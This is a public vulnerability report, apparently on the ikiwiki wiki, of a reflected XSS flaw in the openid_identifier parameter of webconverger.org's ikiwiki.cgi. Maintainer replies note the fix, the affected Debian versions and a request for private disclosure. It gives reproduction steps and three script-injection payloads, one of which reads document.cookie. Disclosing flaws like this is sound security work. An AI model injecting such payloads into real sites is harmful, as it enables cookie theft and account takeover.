Respected Sir,
Your website "webconverger.org" is vulnerable to XSS Attack.

Vulnerable Links:
webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1

How To Reproduce The Vulnerability :

1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
3. forward the request

XSS Payload :

1. `"></script><script>prompt(909043)</script>`
2. `"></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>`
3. `"></script><script>prompt(document.cookie)</script>`

NOTE : Proof of concept is attached.


Thank You...!!


Your Faithfully,
Raghav Bisht
raghav007bisht@gmail.com

> Thanks Raghav for reporting this issue. I've fixed it in ikiwiki.
> 
> --[[Joey]] 

>> [[Fix released|done]] as [[news/version_3.20150329]].
>>
>> Please try to report security vulnerabilities in private first,
>> to give maintainers a chance to fix them without making it easier
>> for attackers to exploit the newly discovered vulnerability
>> until the maintainer can respond ("[[!wikipedia responsible disclosure]]").
>> In this particular case, I was away from my computer for a few days
>> and was unable to make a release until I got back. --[[smcv]]

> Are versions `3.20120629` or `3.20130904.1~bpo70+1` vulnerable? (`wheezy` and
> `wheezy-backports`, respectively) — [[Jon]]

>> 3.20120629 is vulnerable; fixed in 3.20120629.2, which is in the proposed-updates
>> queue (the security team declined to issue a DSA). The blogspam plugin doesn't
>> work in wheezy either; again, a fix is in the proposed-updates queue.
>>
>> 3.20130904.1~bpo70+1 is almost certainly vulnerable, it looks as though someone
>> has done a drive-by backport but not kept it updated. None of ikiwiki's Debian
>> maintainers are involved in that backport; the .deb from jessie (or even from
>> experimental) works fine on wheezy without recompilation. I use the latest
>> upstream release from experimental on my otherwise-Debian-7 server. --[[smcv]]
